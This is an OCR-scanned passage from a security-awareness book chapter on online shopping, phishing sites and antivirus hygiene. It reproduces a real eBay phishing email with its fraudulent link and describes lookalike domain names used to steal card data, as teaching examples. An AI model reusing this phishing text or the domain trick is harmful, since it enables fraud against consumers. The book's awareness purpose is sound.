A Note about E.commerce Web Sites

You probably know people who are reluctant to buy goods on line, even from brand-name companies such as Amazon and eBay, or the Web sites of Old Navy, Target, or Nike. In a way, they're right to be suspicious. If your browser uses today's standard of 128-bit encryption, the information you send to any secure site goes out from your computer encrypted. This data could be unencrypted with a lot of effort, but probably is not breakable in a reasonable amount of time, except perhaps by the National Security Agency (and the NSA, so far 98 as we know, has not shown any interest in stealing credit card numbers of American citizens or trying to find out who is ordering sexy videotapes or kinky underwear).

 

These encrypted files could actually be broken by anyone with the time and resources. But really, what fool would go to all that effort to steal one credit card number when many e-commerce companies make the mistake of storing all their customer financial information unencrypted in their databases? Worse, a number of e-commerce companies that use a particular SQL database software badly compound the problem: They have never changed the default system administrator password for the program. When they took the software out of the box, the password was "null," and it's still "null" today. So the contents of the database are available to anyone on the Internet who decides to try to connect to the database server. These sites are under attack all the time and information does get stolen, without anyone being the wiser,

 

On the other hand, the same people who won't buy on the Internet because they're afraid of having their credit card information stolen

 

have no problem buying with that same credit card in a brick-and- mortar store, or paying for lunch, dinner, or drinks with the card

even in a back-street bar or restaurant they wouldn't take their mother to. Credit card receipts get stolen from these places all the time, or fished out of trash bins in the back alley. And any unscrupulous clerk or waiter can jot down your name and card info, or use a gadget readily available on the Internet, a card-swiping device that stores data from any credit card passed through it, for later retrieval.

 

There are some hazards to shopping on line, but it's probably as safe as shopping in a bricks-and-mortar store. And the credit card companies offer you the same protection when using your card on line--if any fraudulent charges get made to the account, you're only responsible for the first $50.

So in my opinion, fear of shopping online is just another misplaced  

worry.

 

Edgar didn't notice any of the several tell-tale signs that something was wrong with this email (for example, the semicolon after the greeting line, and the garbled text about "our valued customer service with excellent service"). He clicked on the link, entered the information requested - name, address, phone number, and credit card information - and sat. back to wait for the five-dollar credit to show up on his next credit-card bill. What showed up instead was a list of charges for items he never purchased.

 

Analyzing the Con

Edgar had been taken in by a commonplace Internet scam. It's a scam that comes in a variety of forms. One of them (detailed in Chapter 9) involves a decoy login screen created by the attacker that looks identical to the real thing. The difference is that the phony screen doesn't give access to the computer system that the user is trying to reach, but instead feeds his username and password to the hacker.

 

Edgar had been taken in by a scam in which the crooks had registered a Web site with the name "paypal-secure.com"- which sounds as if it should have been a secure page on the legitimate PayPal site, but it isn't. When he entered information on that site, the attackers got just what they wanted.

 

MITNICK MESSAGE

While not foolproof (no security is), whenever visiting a site that requests information you consider private, always ensure that the connection is authenticated and encrypted. And even more important, do not automatically click Yes in any dialog box that may indicate a security issue, such as an invalid, expired, or revoked digital certificate.

 

VARIATIONS ON THE VARIATION

How many other ways are there to deceive computer users into going to a bogus Web site where they provide confidential information? I don't suppose anyone has a valid, accurate answer, but "lots and lots" will serve the purpose.

 

The Missing Link

One trick pops up regularly: Sending out an email that offers a tempting reason to visit a site, and provides a link for going directly to it. Except that the link doesn't take you to the site you think you're going to, because the link actually only resembles a link for that site. Here's another exam- pie that has actually been used on the Internet, again involving misuse of the name PayPal:

 

www. PayPai. com

 

At a quick glance, this looks as if it says PayPal. Even if the victim notices, he may think it's just a slight defect in the text that makes the "I" of Pal look like an "i." And who would notice at a glance that:

 

www. PayPal. com

 

uses the number 1 instead of a lowercase letter L? There are enough people who accept misspellings and other misdirection to make this gambit continually popular with credit card bandits. When people go to the phony site, it looks like the site they expected to go to, and they blithely enter their credit card information. To set up one of these scares, an attacker only needs to register the phony domain name, send out his emails, and wait for suckers to show up, ready to be cheated.

 

In mid-2002, I received an email, apparently part of a mass mailing that was marked as being from "Ebay@ebay.com." The message is shown in Figure 8.1.

 

Figure 8.1. The link in this or any other email should be used with caution.

------------------------------------------------------------------------------------------------------------------

msg: Dear eBay User,

 

It has become very noticeable that another party has

been corrupting your eBay account and has violated our User Agreement

policy listed:

 

4. Bidding and Buying

 

You are obligated to complete the transaction with the

seller if you purchase an item through one of our fixed price formats or are the highest bidder as described below. If you are the highest bidder at the end of an auction (meeting the applicable minimum bid or reserve requirements) and your bid is accepted by the seller, you are obligated to complete the transaction with the seller, or the transaction is prohibited by law or by this Agreement.

 

You received this notice from eBay because it has come

to our attention that your current account has caused interruptions with other eBay members and eBay requires immediate verification for your account. Please verify your account or the account may become disabled. Click Here To Verify Your Account - http://error ebay.tripod.com

 

Designated trademarks and brands are the property of

their respective owners, eBay and the eBay logo are trademarks of eBay Inc.

---------------------------------------------------------------------------------------------------------------------

 

 

Victims who clicked on the link went to a Web page that looked very much like an eBay page. In fact, the page was well designed, with an authentic eBay logo, and "Browse," "Sell" and other navigation links that, if clicked, took the visitor to the actual eBay site. There was also a security logo in the bottom right corner. To deter the savvy victim, the designer had even used HTML encryption to mask where the user-provided information was being sent.

 

It was an excellent example of a malicious computer-based social engineering attack. Still, it was not without several flaws.

 

The email message was not well written; in particular, the paragraph beginning "You received this notice" is clumsy and inept (the people responsible for these hoaxes never hire a professional to edit their copy, and it always shows). Also, anybody who was paying close attention would have become suspicious about eBay asking for the visitor's PayPal information; there is no reason eBay would ask a customer for this private information involving a different company.

 

And anyone knowledgeable about the Internet would probably recognize that the hyperlink connects not to the eBay domain but to tripod.com, which is a free Web hosting service. This was a dead giveaway that the email was not legitimate. Still, I bet a lot of people entered their information, including a credit card number, onto this page.

 

NOTE

Why are people allowed to register deceptive or inapproprate domain names?. Because under current law and on-line policy, anyone can register any site names that’ not already in use.

 

Companies try to fight this use of copycat addresses, but consider what they’re up against. General Motors filed suit against a company that registered f**kgeneralmotors.com (but without the asterisks) and pointed the URL to General Motor's Web site. GM lost.

 

 

Be Alert

As individual users of the Internet, we all need to be alert, making a conscious decision about when it's okay to enter personal information, passwords, account numbers, PINs, and the like.

 

How many people do you know who could tell you whether a particular Internet page they're looking at meets the requirements of a secure page? How many employees in your company know what to look for?

 

Everyone who uses the Internet should know about the little symbol that often appears somewhere on a Web page and looks like a drawing of a padlock. They should know that when the hasp is closed, the site has been certified as being secure. When the hasp is open or the lock icon is missing, the Web site is not authenticated as genuine, and any information transmitted is in the clear--that is, unencrypted.

 

However, an attacker who manages to compromise administrative privileges on a company computer may be able to modify or patch the operating system code to change the user's perception of what is really happening. For example, the programming instructions in the browser software that indicate a Web site's digital certificate is invalid can be modified to bypass the check. Or the system could be modified with something called a root kit, installing one or more back doors at the operating system level, which are harder to detect.

 

A secure connection authenticates the site as genuine, and encrypts the information being communicated, so an attacker cannot make use of any data that is intercepted. Can you trust any Web site, even one that uses a secure connection? No, because the site owner may not be vigilant about applying all the necessary security patches, or forcing users or administrators to respect good password practices. So you can't assume that any supposedly secure site is invulnerable to attack.

 

 

LINGO

BACK DOOR A covert entry point that provides a secret way into a user’s computer that is unkown to the user. Also used by programmers while developing a software program so that they can go into the program to fix problems

 

Secure HTTP (hypertext transfer protocol) or SSL (secure sockets layer) provides an automatic mechanism that uses digital certificates not only to encrypt information being sent to the distant site, but also to provide authentication (an assurance that you are communicating with the genuine Web site). However, this protection mechanism does not work for users who fail to pay attention to whether the site name displayed in the address bar is in fact the correct address of the site they're trying to access.

 

Another security issue, mostly ignored, appears as a warning message that says something like "This site is not secure or the security certificate has expired. Do you want to go to the site anyway?" Many Internet users don't understand the message, and when it appears, they simply click Okay or Yes and go on with their work, unaware that they may be on quicksand. Be warned: On a Web site that does not use a secure protocol, you should never enter any confidential information such as your address or phone number, credit card or bank account numbers, or anything else you want to keep private.

 

Thomas Jefferson said maintaining our freedom required "eternal vigilance." Maintaining privacy and security in a society that uses information as currency requires no less.

 

Becoming Virus Savvy

A special note about virus software: It is essential for the corporate intranet, but also essential for every employee who uses a computer. Beyond just having anti virus software installed on their machines, users obviously need to have the software turned on (which many people don't like because it inevitably slows down some computer functions).

 

With anti virus software there's another important procedure to keep in

mind, as well: Keeping the virus definitions up to date. Unless your company is set up to distribute software or updates over the network to every user, each individual user must carry the responsibility of downloading the

 

latest set of virus definitions on his own. My personal recommendation is to have everyone set the virus software preferences so that new virus definitions are automatically updated every day.

LINGO

SECURE SOCKETS LAYER A protocol developed by Netscape that provides authentication of both client and server in a secure communication on the internet.

 

Simply put, you're vulnerable unless the virus definitions are updated regularly. And even so, you're still not completely safe from viruses or worms that the anti virus software companies don't yet know about or haven't yet published a detection pattern file for.

 

All employees with remote access privileges from their laptops or home computers need to have updated virus software and a personal firewall on those machines at a minimum. A sophisticated attacker will look at the big picture to seek out the weakest link, and that's where he'll attack. Reminding people with remote computers regularly about the need for personal firewalls and updated, active virus software is a corporate responsibility, because you can't expect that individual workers, managers, sales people, and others remote from an IT department will remember the dangers of leaving their computers unprotected.

 

Beyond these steps, I strongly recommend use of the less common, but no less important, software packages that guard against Trojan Horse attacks, so-called anti-Trojan software. At the time of this writing, two of the better-known programs are The Cleaner (www.moosoft.com), and Trojan Defense Sweep (www.diamondcs.com.au).

 

Finally, what is probably the most important security message of all for companies that do not scan for dangerous emails at the corporate gateway: Since we all tend to be forgetful or negligent about things that seem peripheral to getting our jobs done, employees need to be reminded over and over again, in different ways, about not opening email attachments unless they are certain that the source is a person or organization they can trust. And management also needs to remind employees that they must use active virus software and anti-Trojan software that provides invaluable protection against the seemingly trustworthy email that may contain a destructive payload.

 

Chapter 8